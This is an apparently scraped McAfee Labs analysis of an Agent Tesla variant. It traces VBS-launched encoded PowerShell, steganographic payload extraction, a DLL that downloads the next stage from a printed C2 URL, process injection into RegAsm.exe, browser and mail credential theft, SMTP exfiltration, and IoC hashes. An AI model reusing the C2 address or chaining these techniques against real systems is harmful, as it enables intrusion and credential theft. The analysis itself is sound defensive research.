![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/heatmap.png\")
<\/p>\nAuthored by Yashvi Shah<\/p>\n
Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.<\/p>\n
Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.<\/p>\n
The following heat map shows the current prevalence of Agent Tesla on field:<\/p>\n
<\/p>\n
Figure 1: Agent Tesla heat map<\/em><\/p>\n McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.<\/p>\n The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.<\/p>\n Figure 2: Infection Chain<\/em><\/p>\n VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.<\/p>\n Figure 3: Process Tree<\/em><\/p>\n The first PowerShell command is encoded as illustrated here:<\/p>\n Figure 4: Encoded First PowerShell<\/em><\/p>\n Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:<\/p>\n Figure 5: Decoded content<\/em><\/p>\n The deciphered content serves as the parameter passed to the second instance of PowerShell..<\/p>\n Figure 6: Second PowerShell command<\/em><\/p>\n Deconstructing this command line for clearer comprehension:<\/p>\n Figure 7: Disassembled command<\/em><\/p>\n As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:<\/p>\n Figure 8: Downloaded image<\/em><\/p>\n This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable \u2018base64Length\u2019. The data enclosed between these markers is stored in \u2018base64Command\u2019. The subsequent images illustrate these markers and the content encapsulated between them.<\/p>\n Figure 9: Steganography<\/em><\/p>\n After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.<\/p>\n Figure 10: DLL obtained from steganography<\/em><\/p>\n This DLL serves two purposes:<\/p>\n Figure 11: DLL loaded<\/em><\/p>\n In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:<\/p>\n $arguments = ,(‘txt.46ezabwenrtsac\/42.021.871.591\/\/:ptth’)<\/p>\n The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:<\/p>\n http:\/\/195.178.120.24 \/castrnewbaze64.txt<\/u><\/em><\/p>\n Figure 12: Request for payload<\/em><\/p>\n Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.<\/p>\n Figure 13: Downloaded text file<\/em><\/p>\n In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.<\/p>\n Figure 14: Final payload<\/em><\/p>\n In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:<\/p>\n “C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe”.<\/em><\/strong><\/p>\n Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.<\/p>\n Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:<\/p>\n Figure 15: Process Injection<\/em><\/p>\n By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function \u2018hU0H4qUiSpCA13feW0\u2019 is used for replacing content. For example,<\/p>\n “kern!”.Replace(“!”, “el32”)\u00a0 \u00e0\u00a0 kernel32<\/p>\n Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) \u00e0 VirtualAllocEx<\/p>\n As a result, these functions translate into the subsequent API calls:<\/p>\n Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.<\/p>\n The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:<\/p>\n Figure 16: Obfuscation<\/em><\/p>\n Fingerprinting<\/strong>:<\/p>\n Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:<\/p>\n Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.<\/p>\n Figure 17: Opera browser<\/em><\/p>\n Figure 18: Yandex browser<\/em><\/p>\n Figure 19: Iridium browser<\/em><\/p>\n Figure 20: Chromium browser<\/em><\/p>\n Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:<\/p>\n Figure 21: User data retrieval from all browsers -1<\/em><\/p>\n Figure 22: User data retrieval from all browsers \u2013 2<\/em><\/p>\n Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:<\/p>\n Figure 23: Mail clients<\/em><\/p>\n Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.<\/p>\n The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.<\/p>\n Figure 24: Function calls made for exfiltration.<\/em><\/p>\n This is the procedure by which functions are invoked to facilitate data extraction via SMTP:<\/p>\n Figure 25: Port number<\/em><\/p>\n Figure 26: Domain retrieval<\/em><\/p>\n Figure 27: Email address used<\/em><\/p>\n Figure 28: Password<\/em><\/p>\n The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.<\/p>\n Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.<\/p>\n The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.<\/p>\n Table 1:Indicators of Compromise<\/p>\n","protected":false},"excerpt":{"rendered":" Authored by Yashvi Shah Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the…<\/p>\n","protected":false},"author":695,"featured_media":174285,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-173859","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"\nTechnical Analysis<\/strong><\/h2>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Injection_chain.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/ProcessTree.png\")
<\/p>\nFirst PowerShell command<\/strong><\/h3>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/First-Powershell.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Decoded-first-powershell-1.png\")
<\/p>\nSecond PowerShell Command<\/strong><\/h3>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Second-PowerShell-1024x209.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/disassembled-command.png\")
<\/p>\nSteganography <\/strong><\/h3>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Downloaded-Image.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Steganography.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/dllpayload.png\")
<\/p>\nProcess Injection into RegAsm.exe<\/strong><\/h3>\n
\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Dll-loaded.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/get_request_for_payload.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/downloaded-text-file.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Final-payload.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/processinjection.png\")
<\/p>\n\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/obfuscation.png\")
<\/p>\nCollection of data:<\/strong><\/h3>\n
\n
Web Browsers:<\/strong><\/h3>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Opera.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/yandex.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Iridium.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Chromium.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/data-from-browser-1.png\")
<\/p>\n![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/data-from-browser-2.png\")
<\/p>\nMail Clients:<\/strong><\/h3>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/mail-clients.png\")
<\/p>\nExfiltration:<\/strong><\/h2>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/Function-calls-made-for-exfiltration.-1024x615.png\")
<\/p>\n\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/port-number.png\")
<\/p>\n\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/corpsa-domain-retrieval.png\")
<\/p>\n\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/corpsa_email.png\")
<\/p>\n\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/09\/corpsa_password.png\")
<\/p>\nSummary<\/strong>:<\/strong><\/h3>\n
Indicators of compromise (IoC):<\/strong><\/h3>\n
\n\n
\n File<\/strong><\/td>\n MD5<\/strong><\/td>\n SHA256<\/strong><\/td>\n<\/tr>\n \n VBS file<\/strong><\/td>\n e2a4a40fe8c8823ed5a73cdc9a8fa9b9<\/td>\n e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5<\/td>\n<\/tr>\n \n JPEG file<\/strong><\/td>\n ec8dfde2126a937a65454323418e28da<\/td>\n 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f<\/td>\n<\/tr>\n \n DLL file<\/strong><\/td>\n b257f83495996b9a79d174d60dc02caa<\/td>\n b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f<\/td>\n<\/tr>\n \n Final payload<\/strong><\/td>\n dd94daef4081f63cf4751c3689045213<\/td>\n abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n